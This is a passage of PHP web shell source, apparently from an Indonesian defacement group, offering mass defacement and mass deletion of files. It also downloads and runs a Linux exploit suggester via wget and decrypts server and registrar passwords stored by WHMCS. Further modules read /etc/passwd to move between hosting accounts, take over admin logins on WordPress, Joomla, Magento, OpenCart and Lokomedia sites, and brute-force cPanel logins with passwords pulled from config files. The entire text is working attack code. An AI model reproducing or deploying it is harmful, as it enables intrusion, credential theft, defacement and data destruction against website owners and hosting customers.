1160.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
1161.                     }
1162.     function ListFiles($dirrall) {
1163.  
1164.     if($dh = opendir($dirrall)) {
1165.  
1166.        $files = Array();
1167.        $inner_files = Array();
1168.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1169.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
1170.         while($file = readdir($dh)) {
1171.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
1172.                 if(is_dir($dirrall . "/" . $file)) {
1173.                     $inner_files = ListFiles($dirrall . "/" . $file);
1174.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1175.                 } else {
1176.                     array_push($files, $dirrall . "/" . $file);
1177.                 }
1178.             }
1179.             }
1180.  
1181.             closedir($dh);
1182.             return $files;
1183.         }
1184.     }
1185.     function gass_all(){
1186.         global $index ;
1187.         $dirrall=$_POST['d_dir'];
1188.         foreach (ListFiles($dirrall) as $key=>$file){
1189.             $file = str_replace('//',"/",$file);
1190.             echo "<center><strong>$file</strong> ===>";
1191.             edit_file($file,$index);
1192.             flush();
1193.         }
1194.         $key = $key+1;
1195.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
1196.     function sabun_massal($dir,$namafile,$isi_script) {
1197.         if(is_writable($dir)) {
1198.             $dira = scandir($dir);
1199.             foreach($dira as $dirb) {
1200.                 $dirc = "$dir/$dirb";
1201.                 $lokasi = $dirc.'/'.$namafile;
1202.                 if($dirb === '.') {
1203.                     file_put_contents($lokasi, $isi_script);
1204.                 } elseif($dirb === '..') {
1205.                     file_put_contents($lokasi, $isi_script);
1206.                 } else {
1207.                     if(is_dir($dirc)) {
1208.                         if(is_writable($dirc)) {
1209.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
1210.                             file_put_contents($lokasi, $isi_script);
1211.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
1212.                         }
1213.                     }
1214.                 }
1215.             }
1216.         }
1217.     }
1218.     if($_POST['mass'] == 'onedir') {
1219.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
1220.         $ini="http://";
1221.         $mainpath=$_POST[d_dir];
1222.         $file=$_POST[d_file];
1223.         $dir=opendir("$mainpath");
1224.         $code=base64_encode($_POST[script]);
1225.         $indx=base64_decode($code);
1226.         while($row=readdir($dir)){
1227.         $start=@fopen("$row/$file","w+");
1228.         $finish=@fwrite($start,$indx);
1229.         if ($finish){
1230.             echo"$ini$row/$file\n";
1231.             }
1232.         }
1233.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
1234.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
1235.         $dir=opendir("$mainpath");
1236.         $code=base64_encode($_POST[script]);
1237.         $indx=base64_decode($code);
1238.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
1239.         $finish=@fwrite($start,$indx);
1240.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
1241.         }
1242.  
1243.     }
1244.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
1245.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
1246.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
1247.     elseif($_POST['mass'] == 'massdeface') {
1248.         echo "<div style='margin: 5px auto; padding: 5px'>";
1249.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1250.         echo "</div>";  }
1251.     else {
1252.         echo "
1253.         <center><font style='text-decoration: underline;'>
1254.         Select Type:<br>
1255.         </font>
1256.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
1257.         <option value=\"onedir\">Mass Deface 1 Dir</option>
1258.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
1259.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
1260.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
1261.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
1262.         <font style='text-decoration: underline;'>Folder:</font><br>
1263.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1264.         <font style='text-decoration: underline;'>Filename:</font><br>
1265.         <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
1266.         <font style='text-decoration: underline;'>Index File:</font><br>
1267.         <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font color=white>[ </font><font color=red>!</font><font color=white> ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED BY AZZATSSINS CYBERSERKERS - CRACKED BY AZZATSSINS CYBERSERKERS - DEFACED BY AZZATSSINS CYBERSERKERS - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
1268.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1269.         </form></center>";
1270.         }
1271.     } elseif($_GET['do'] == 'root') {
1272. system('wget -O lnx.pl https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl');
1273. echo "<br><pre>";
1274. echo system('perl lnx.pl');
1275. echo "</pre><br>";
1276. sleep("5");
1277. unlink('lnx.pl');
1278. } elseif($_GET['do'] == 'whmcs') {
1279. echo'<form action="?dir=$dir&do=whmcs" method="post">
1280. ';
1281. function decrypt ($string,$cc_encryption_hash)
1282. {
1283.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
1284.     $hash_key = _hash ($key);
1285.     $hash_length = strlen ($hash_key);
1286.     $string = base64_decode ($string);
1287.     $tmp_iv = substr ($string, 0, $hash_length);
1288.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
1289.     $iv = $out = '';
1290.     $c = 0;
1291.     while ($c < $hash_length)
1292.     {
1293.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
1294.         ++$c;
1295.     }
1296.     $key = $iv;
1297.     $c = 0;
1298.     while ($c < strlen ($string))
1299.     {
1300.         if (($c != 0 AND $c % $hash_length == 0))
1301.         {
1302.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
1303.         }
1304.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
1305.         ++$c;
1306.     }
1307.     return $out;
1308. }
1309.  
1310. function _hash ($string)
1311. {
1312.     if (function_exists ('sha1'))
1313.     {
1314.         $hash = sha1 ($string);
1315.     }
1316.     else
1317.     {
1318.         $hash = md5 ($string);
1319.     }
1320.     $out = '';
1321.     $c = 0;
1322.     while ($c < strlen ($hash))
1323.     {
1324.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
1325.         $c += 2;
1326.     }
1327.     return $out;
1328. }
1329.  
1330. echo "
1331. <br>
1332.  
1333. <FORM method='post'>
1334. <input type='hidden' name='form_action' value='2'>
1335. <br>
1336. <table class=tabnet style=width:320px;padding:0 1px;>
1337. <tr><th colspan=2>WHMCS DECODER</th></tr>
1338. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1339. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1340. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1341. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1342. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1343. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
1344. </table>
1345. </FORM>
1346. </center>
1347. ";
1348.  
1349.  if($_POST['form_action'] == 2 )
1350.  {
1351.  //include($file);
1352.  $db_host=($_POST['db_host']);
1353.  $db_username=($_POST['db_username']);
1354.  $db_password=($_POST['db_password']);
1355.  $db_name=($_POST['db_name']);
1356.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
1357.  
1358.  
1359.  
1360.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1361.         mysql_select_db($db_name,$link) ;
1362. $query = mysql_query("SELECT * FROM tblservers");
1363. while($v = mysql_fetch_array($query)) {
1364. $ipaddress = $v['ipaddress'];
1365. $username = $v['username'];
1366. $type = $v['type'];
1367. $active = $v['active'];
1368. $hostname = $v['hostname'];
1369. echo("<center><table border='1'>");
1370. $password = decrypt ($v['password'], $cc_encryption_hash);
1371. echo("<tr><td>Type</td><td>$type</td></tr>");
1372. echo("<tr><td>Active</td><td>$active</td></tr>");
1373. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1374. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1375. echo("<tr><td>Username</td><td>$username</td></tr>");
1376. echo("<tr><td>Password</td><td>$password</td></tr>");
1377.  
1378. echo "</table><br><br></center>";
1379. }
1380.  
1381.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1382.         mysql_select_db($db_name,$link) ;
1383. $query = mysql_query("SELECT * FROM tblregistrars");
1384. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1385. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1386. while($v = mysql_fetch_array($query)) {
1387. $registrar     = $v['registrar'];
1388. $setting = $v['setting'];
1389. $value = decrypt ($v['value'], $cc_encryption_hash);
1390. if ($value=="") {
1391. $value=0;
1392. }
1393. $password = decrypt ($v['password'], $cc_encryption_hash);
1394. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1395. }
1396. }
1397.    
1398.  
1399. } elseif($_GET['do'] == 'jumping') {
1400.     $i = 0;
1401.     echo "<div class='margin: 5px auto;'>";
1402.     if(preg_match("/hsphere/", $dir)) {
1403.         $urls = explode("\r\n", $_POST['url']);
1404.         if(isset($_POST['jump'])) {
1405.             echo "<pre>";
1406.             foreach($urls as $url) {
1407.                 $url = str_replace(array("http://","www."), "", strtolower($url));
1408.                 $etc = "/etc/passwd";
1409.                 $f = fopen($etc,"r");
1410.                 while($gets = fgets($f)) {
1411.                     $pecah = explode(":", $gets);
1412.                     $user = $pecah[0];
1413.                     $dir_user = "/hsphere/local/home/$user";
1414.                     if(is_dir($dir_user) === true) {
1415.                         $url_user = $dir_user."/".$url;
1416.                         if(is_readable($url_user)) {
1417.                             $i++;
1418.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1419.                             if(is_writable($url_user)) {
1420.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1421.                             }
1422.                             echo $jrw."<br>";
1423.                         }
1424.                     }
1425.                 }
1426.             }
1427.         if($i == 0) {
1428.         } else {
1429.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1430.         }
1431.         echo "</pre>";
1432.         } else {
1433.             echo '<center>
1434.                   <form method="post">
1435.                   List Domains: <br>
1436.                   <textarea name="url" style="width: 500px; height: 250px;">';
1437.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1438.             while($getss = fgets($fp)) {
1439.                 echo $getss;
1440.             }
1441.             echo  '</textarea><br>
1442.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1443.                   </form></center>';
1444.         }
1445.     } elseif(preg_match("/vhosts/", $dir)) {
1446.         $urls = explode("\r\n", $_POST['url']);
1447.         if(isset($_POST['jump'])) {
1448.             echo "<pre>";
1449.             foreach($urls as $url) {
1450.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
1451.                 if(is_dir($web_vh) === true) {
1452.                     if(is_readable($web_vh)) {
1453.                         $i++;
1454.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1455.                         if(is_writable($web_vh)) {
1456.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1457.                         }
1458.                         echo $jrw."<br>";
1459.                     }
1460.                 }
1461.             }
1462.         if($i == 0) {
1463.         } else {
1464.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1465.         }
1466.         echo "</pre>";
1467.         } else {
1468.             echo '<center>
1469.                   <form method="post">
1470.                   List Domains: <br>
1471.                   <textarea name="url" style="width: 500px; height: 250px;">';
1472.                   bing("ip:$ip");
1473.             echo  '</textarea><br>
1474.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1475.                   </form></center>';
1476.         }
1477.     } else {
1478.         echo "<pre>";
1479.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1480.         while($passwd = fgets($etc)) {
1481.             if($passwd == '' || !$etc) {
1482.                 echo "<font color=red>Can't read /etc/passwd</font>";
1483.             } else {
1484.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1485.                 foreach($user_jumping[1] as $user_idx_jump) {
1486.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
1487.                     if(is_readable($user_jumping_dir)) {
1488.                         $i++;
1489.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1490.                         if(is_writable($user_jumping_dir)) {
1491.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1492.                         }
1493.                         echo $jrw;
1494.                         if(function_exists('posix_getpwuid')) {
1495.                             $domain_jump = file_get_contents("/etc/named.conf");   
1496.                             if($domain_jump == '') {
1497.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1498.                             } else {
1499.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1500.                                 foreach($domains_jump[1] as $dj) {
1501.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1502.                                     $user_jumping_url = $user_jumping_url['name'];
1503.                                     if($user_jumping_url == $user_idx_jump) {
1504.                                         echo " => ( <u>$dj</u> )<br>";
1505.                                         break;
1506.                                     }
1507.                                 }
1508.                             }
1509.                         } else {
1510.                             echo "<br>";
1511.                         }
1512.                     }
1513.                 }
1514.             }
1515.         }
1516.         if($i == 0) {
1517.         } else {
1518.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1519.         }
1520.         echo "</pre>";
1521.     }
1522.     echo "</div>";
1523.  
1524. } elseif($_GET['do'] == 'auto_edit_user') {
1525.     if($_POST['hajar']) {
1526.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1527.             echo "username atau password harus lebih dari 6 karakter";
1528.         } else {
1529.             $user_baru = $_POST['user_baru'];
1530.             $pass_baru = md5($_POST['pass_baru']);
1531.             $conf = $_POST['config_dir'];
1532.             $scan_conf = scandir($conf);
1533.             foreach($scan_conf as $file_conf) {
1534.                 if(!is_file("$conf/$file_conf")) continue;
1535.                 $config = file_get_contents("$conf/$file_conf");
1536.                 if(preg_match("/JConfig|joomla/",$config)) {
1537.                     $dbhost = ambilkata($config,"host = '","'");
1538.                     $dbuser = ambilkata($config,"user = '","'");
1539.                     $dbpass = ambilkata($config,"password = '","'");
1540.                     $dbname = ambilkata($config,"db = '","'");
1541.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1542.                     $prefix = $dbprefix."users";
1543.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1544.                     $db = mysql_select_db($dbname);
1545.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1546.                     $result = mysql_fetch_array($q);
1547.                     $id = $result['id'];
1548.                     $site = ambilkata($config,"sitename = '","'");
1549.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1550.                     echo "Config => ".$file_conf."<br>";
1551.                     echo "CMS => Joomla<br>";
1552.                     if($site == '') {
1553.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1554.                     } else {
1555.                         echo "Sitename => $site<br>";
1556.                     }
1557.                     if(!$update OR !$conn OR !$db) {
1558.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1559.                     } else {
1560.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1561.                     }
1562.                     mysql_close($conn);
1563.                 } elseif(preg_match("/WordPress/",$config)) {
1564.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
1565.                     $dbuser = ambilkata($config,"DB_USER', '","'");
1566.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1567.                     $dbname = ambilkata($config,"DB_NAME', '","'");
1568.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
1569.                     $prefix = $dbprefix."users";
1570.                     $option = $dbprefix."options";
1571.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1572.                     $db = mysql_select_db($dbname);
1573.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1574.                     $result = mysql_fetch_array($q);
1575.                     $id = $result[ID];
1576.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1577.                     $result2 = mysql_fetch_array($q2);
1578.                     $target = $result2[option_value];
1579.                     if($target == '') {
1580.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1581.                     } else {
1582.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1583.                     }
1584.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1585.                     echo "Config => ".$file_conf."<br>";
1586.                     echo "CMS => Wordpress<br>";
1587.                     echo $url_target;
1588.                     if(!$update OR !$conn OR !$db) {
1589.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1590.                     } else {
1591.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1592.                     }
1593.                     mysql_close($conn);
1594.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1595.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1596.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1597.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1598.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1599.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1600.                     $prefix = $dbprefix."admin_user";
1601.                     $option = $dbprefix."core_config_data";
1602.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1603.                     $db = mysql_select_db($dbname);
1604.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1605.                     $result = mysql_fetch_array($q);
1606.                     $id = $result[user_id];
1607.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1608.                     $result2 = mysql_fetch_array($q2);
1609.                     $target = $result2[value];
1610.                     if($target == '') {
1611.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1612.                     } else {
1613.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1614.                     }
1615.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1616.                     echo "Config => ".$file_conf."<br>";
1617.                     echo "CMS => Magento<br>";
1618.                     echo $url_target;
1619.                     if(!$update OR !$conn OR !$db) {
1620.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1621.                     } else {
1622.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1623.                     }
1624.                     mysql_close($conn);
1625.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1626.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1627.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1628.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1629.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1630.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1631.                     $prefix = $dbprefix."user";
1632.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1633.                     $db = mysql_select_db($dbname);
1634.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1635.                     $result = mysql_fetch_array($q);
1636.                     $id = $result[user_id];
1637.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
1638.                     if($target == '') {
1639.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1640.                     } else {
1641.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1642.                     }
1643.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1644.                     echo "Config => ".$file_conf."<br>";
1645.                     echo "CMS => OpenCart<br>";
1646.                     echo $url_target;
1647.                     if(!$update OR !$conn OR !$db) {
1648.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1649.                     } else {
1650.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1651.                     }
1652.                     mysql_close($conn);
1653.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1654.                     $dbhost = ambilkata($config,'server = "','"');
1655.                     $dbuser = ambilkata($config,'username = "','"');
1656.                     $dbpass = ambilkata($config,'password = "','"');
1657.                     $dbname = ambilkata($config,'database = "','"');
1658.                     $prefix = "users";
1659.                     $option = "identitas";
1660.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1661.                     $db = mysql_select_db($dbname);
1662.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1663.                     $result = mysql_fetch_array($q);
1664.                     $target = $result[alamat_website];
1665.                     if($target == '') {
1666.                         $target2 = $result[url];
1667.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1668.                         if($target2 == '') {
1669.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1670.                         } else {
1671.                             $cek_login3 = file_get_contents("$target2/adminweb/");
1672.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1673.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1674.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1675.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1676.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1677.                             } else {
1678.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1679.                             }
1680.                         }
1681.                     } else {
1682.                         $cek_login = file_get_contents("$target/adminweb/");
1683.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1684.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1685.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1686.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1687.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1688.                         } else {
1689.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1690.                         }
1691.                     }
1692.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1693.                     echo "Config => ".$file_conf."<br>";
1694.                     echo "CMS => Lokomedia<br>";
1695.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1696.                         echo $url_target2;
1697.                     } else {
1698.                         echo $url_target;
1699.                     }
1700.                     if(!$update OR !$conn OR !$db) {
1701.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1702.                     } else {
1703.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1704.                     }
1705.                     mysql_close($conn);
1706.                 }
1707.             }
1708.         }
1709.     } else {
1710.         echo "<center>
1711.         <h1>Auto Edit User Config</h1>
1712.         <form method='post'>
1713.         DIR Config: <br>
1714.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1715.         Set User & Pass: <br>
1716.         <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
1717.         <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
1718.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1719.         </form>
1720. <br>
1721.         ";
1722.     }
1723. } elseif($_GET['do'] == 'cpanel') {
1724.     if($_POST['crack']) {
1725.         $usercp = explode("\r\n", $_POST['user_cp']);
1726.         $passcp = explode("\r\n", $_POST['pass_cp']);
1727.         $i = 0;
1728.         foreach($usercp as $ucp) {
1729.             foreach($passcp as $pcp) {
1730.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1731.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1732.                     } else {
1733.                         $_SESSION[$ucp] = "1";
1734.                         $_SESSION[$pcp] = "1";
1735.                         if($ucp == '' || $pcp == '') {
1736.                            
1737.                         } else {
1738.                             $i++;
1739.                             if(function_exists('posix_getpwuid')) {
1740.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1741.                                 if($domain_cp == '') {
1742.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1743.                                 } else {
1744.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1745.                                     foreach($domains_cp[1] as $dj) {
1746.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1747.                                         $user_cp_url = $user_cp_url['name'];
1748.                                         if($user_cp_url == $ucp) {
1749.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1750.                                             break;
1751.                                         }
1752.                                     }
1753.                                 }
1754.                             } else {
1755.                                 $dom = "<font color=red>function is Disable by system</font>";
1756.                             }
1757.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1758.                         }
1759.                     }
1760.                 }
1761.             }
1762.         }
1763.         if($i == 0) {
1764.         } else {
1765.             echo "<br>Succes Crack ".$i." Cpanel";
1766.         }
1767.     } else {
1768.         echo "<center>
1769.         <form method='post'>
1770.         USER: <br>
1771.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1772.         $_usercp = fopen("/etc/passwd","r");
1773.         while($getu = fgets($_usercp)) {
1774.             if($getu == '' || !$_usercp) {
1775.                 echo "<font color=red>Can't read /etc/passwd</font>";
1776.             } else {
1777.                 preg_match_all("/(.*?):x:/", $getu, $u);
1778.                 foreach($u[1] as $user_cp) {
1779.                         if(is_dir("/home/$user_cp/public_html")) {
1780.                             echo "$user_cp\n";
1781.                     }
1782.                 }
1783.             }
1784.         }
1785.         echo "</textarea><br>
1786.         PASS: <br>
1787.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1788.         function cp_pass($dir) {
1789.             $pass = "";
1790.             $dira = scandir($dir);
1791.             foreach($dira as $dirb) {
1792.                 if(!is_file("$dir/$dirb")) continue;
1793.                 $ambil = file_get_contents("$dir/$dirb");
1794.                 if(preg_match("/WordPress/", $ambil)) {
1795.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1796.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1797.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1798.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1799.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1800.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1801.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1802.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1803.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1804.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1805.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1806.                     if(preg_match('/"/', $pass1[1])) {
1807.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1808.                         $pass .= $pass1[1]."\n";
1809.                     } else {
1810.                         $pass .= $pass1[1]."\n";
1811.                     }
1812.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1813.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1814.                 }
1815.             }
1816.             echo $pass;
1817.         }
